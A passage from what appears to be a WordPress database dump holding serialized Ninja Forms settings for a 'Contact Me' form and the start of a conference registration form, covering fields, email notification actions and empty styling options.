"\";s:7:\"cellcid\";s:5:\"c3277\";}}i:1;a:2:{s:2:\"id\";i:2;s:8:\"settings\";a:62:{s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:9:\"parent_id\";i:1;s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"2\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3281\";}}i:2;a:2:{s:2:\"id\";i:3;s:8:\"settings\";a:71:{s:5:\"label\";s:7:\"Message\";s:3:\"key\";s:7:\"message\";s:9:\"parent_id\";i:1;s:4:\"type\";s:8:\"textarea\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"3\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3284\";}}i:3;a:2:{s:2:\"id\";i:4;s:8:\"settings\";a:69:{s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:6:\"submit\";s:9:\"parent_id\";i:1;s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:16:\"processing_label\";s:10:\"Processing\";s:5:\"order\";s:1:\"5\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:44:\"submit_element_hover_styles_background-color\";s:0:\"\";s:34:\"submit_element_hover_styles_border\";s:0:\"\";s:40:\"submit_element_hover_styles_border-style\";s:0:\"\";s:40:\"submit_element_hover_styles_border-color\";s:0:\"\";s:33:\"submit_element_hover_styles_color\";s:0:\"\";s:34:\"submit_element_hover_styles_height\";s:0:\"\";s:33:\"submit_element_hover_styles_width\";s:0:\"\";s:37:\"submit_element_hover_styles_font-size\";s:0:\"\";s:34:\"submit_element_hover_styles_margin\";s:0:\"\";s:35:\"submit_element_hover_styles_padding\";s:0:\"\";s:35:\"submit_element_hover_styles_display\";s:0:\"\";s:33:\"submit_element_hover_styles_float\";s:0:\"\";s:45:\"submit_element_hover_styles_show_advanced_css\";s:1:\"0\";s:36:\"submit_element_hover_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3287\";}}}s:7:\"actions\";a:4:{i:0;a:2:{s:2:\"id\";i:1;s:8:\"settings\";a:25:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:55\";s:5:\"label\";s:17:\"Record Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:13:\"email_message\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:1;a:2:{s:2:\"id\";i:2;s:8:\"settings\";a:26:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:55\";s:5:\"label\";s:18:\"Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:24:\"This is an email action.\";s:7:\"message\";s:19:\"Hello, Ninja Forms!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:24:\"Submission Confirmation \";s:13:\"email_message\";s:29:\"<p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:2;a:2:{s:2:\"id\";i:3;s:8:\"settings\";a:24:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:55\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"label\";s:18:\"Email Notification\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:20:\"{system:admin_email}\";s:13:\"email_subject\";s:29:\"New message from {field:name}\";s:13:\"email_message\";s:60:\"<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:19:\"email_message_plain\";s:0:\"\";}}i:3;a:2:{s:2:\"id\";i:4;s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:55\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:47:\"Thank you {field:name} for filling out my form!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:13:\"email_message\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:89:\"<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>\";s:19:\"email_message_plain\";s:0:\"\";}}}s:8:\"settings\";a:99:{s:5:\"title\";s:10:\"Contact Me\";s:3:\"key\";s:0:\"\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"conditions\";a:0:{}s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:9:\"logged_in\";s:0:\"\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}s:33:\"container_styles_background-color\";s:0:\"\";s:23:\"container_styles_border\";s:0:\"\";s:29:\"container_styles_border-style\";s:0:\"\";s:29:\"container_styles_border-color\";s:0:\"\";s:22:\"container_styles_color\";s:0:\"\";s:23:\"container_styles_height\";s:0:\"\";s:22:\"container_styles_width\";s:0:\"\";s:26:\"container_styles_font-size\";s:0:\"\";s:23:\"container_styles_margin\";s:0:\"\";s:24:\"container_styles_padding\";s:0:\"\";s:24:\"container_styles_display\";s:0:\"\";s:22:\"container_styles_float\";s:0:\"\";s:34:\"container_styles_show_advanced_css\";s:1:\"0\";s:25:\"container_styles_advanced\";s:0:\"\";s:29:\"title_styles_background-color\";s:0:\"\";s:19:\"title_styles_border\";s:0:\"\";s:25:\"title_styles_border-style\";s:0:\"\";s:25:\"title_styles_border-color\";s:0:\"\";s:18:\"title_styles_color\";s:0:\"\";s:19:\"title_styles_height\";s:0:\"\";s:18:\"title_styles_width\";s:0:\"\";s:22:\"title_styles_font-size\";s:0:\"\";s:19:\"title_styles_margin\";s:0:\"\";s:20:\"title_styles_padding\";s:0:\"\";s:20:\"title_styles_display\";s:0:\"\";s:18:\"title_styles_float\";s:0:\"\";s:30:\"title_styles_show_advanced_css\";s:1:\"0\";s:21:\"title_styles_advanced\";s:0:\"\";s:27:\"row_styles_background-color\";s:0:\"\";s:17:\"row_styles_border\";s:0:\"\";s:23:\"row_styles_border-style\";s:0:\"\";s:23:\"row_styles_border-color\";s:0:\"\";s:16:\"row_styles_color\";s:0:\"\";s:17:\"row_styles_height\";s:0:\"\";s:16:\"row_styles_width\";s:0:\"\";s:20:\"row_styles_font-size\";s:0:\"\";s:17:\"row_styles_margin\";s:0:\"\";s:18:\"row_styles_padding\";s:0:\"\";s:18:\"row_styles_display\";s:0:\"\";s:28:\"row_styles_show_advanced_css\";s:1:\"0\";s:19:\"row_styles_advanced\";s:0:\"\";s:31:\"row-odd_styles_background-color\";s:0:\"\";s:21:\"row-odd_styles_border\";s:0:\"\";s:27:\"row-odd_styles_border-style\";s:0:\"\";s:27:\"row-odd_styles_border-color\";s:0:\"\";s:20:\"row-odd_styles_color\";s:0:\"\";s:21:\"row-odd_styles_height\";s:0:\"\";s:20:\"row-odd_styles_width\";s:0:\"\";s:24:\"row-odd_styles_font-size\";s:0:\"\";s:21:\"row-odd_styles_margin\";s:0:\"\";s:22:\"row-odd_styles_padding\";s:0:\"\";s:22:\"row-odd_styles_display\";s:0:\"\";s:32:\"row-odd_styles_show_advanced_css\";s:1:\"0\";s:23:\"row-odd_styles_advanced\";s:0:\"\";s:35:\"success-msg_styles_background-color\";s:0:\"\";s:25:\"success-msg_styles_border\";s:0:\"\";s:31:\"success-msg_styles_border-style\";s:0:\"\";s:31:\"success-msg_styles_border-color\";s:0:\"\";s:24:\"success-msg_styles_color\";s:0:\"\";s:25:\"success-msg_styles_height\";s:0:\"\";s:24:\"success-msg_styles_width\";s:0:\"\";s:28:\"success-msg_styles_font-size\";s:0:\"\";s:25:\"success-msg_styles_margin\";s:0:\"\";s:26:\"success-msg_styles_padding\";s:0:\"\";s:26:\"success-msg_styles_display\";s:0:\"\";s:36:\"success-msg_styles_show_advanced_css\";s:1:\"0\";s:27:\"success-msg_styles_advanced\";s:0:\"\";s:33:\"error_msg_styles_background-color\";s:0:\"\";s:23:\"error_msg_styles_border\";s:0:\"\";s:29:\"error_msg_styles_border-style\";s:0:\"\";s:29:\"error_msg_styles_border-color\";s:0:\"\";s:22:\"error_msg_styles_color\";s:0:\"\";s:23:\"error_msg_styles_height\";s:0:\"\";s:22:\"error_msg_styles_width\";s:0:\"\";s:26:\"error_msg_styles_font-size\";s:0:\"\";s:23:\"error_msg_styles_margin\";s:0:\"\";s:24:\"error_msg_styles_padding\";s:0:\"\";s:24:\"error_msg_styles_display\";s:0:\"\";s:34:\"error_msg_styles_show_advanced_css\";s:1:\"0\";s:25:\"error_msg_styles_advanced\";s:0:\"\";}}',4,'\0'),
(2,'a:7:{s:2:\"id\";i:2;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:68:\"ICFSRM 2022 Conference is \" Climate change, challenges and threats \"\";s:3:\"key\";s:77:\"icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:11:\"<p><br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:23:\"Event Intro Description\";s:9:\"field_key\";s:23:\"event_intro_description\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:5;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}s:2:\"id\";i:6;}i:2;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:7;}i:3;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:8;}i:4;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:9;}i:5;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Phone\";s:3:\"key\";s:7:\"textbox\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:7:\"textbox\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:10;}i:6;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_1\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_1\";}s:2:\"id\";i:11;}i:7;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"11\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_2\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 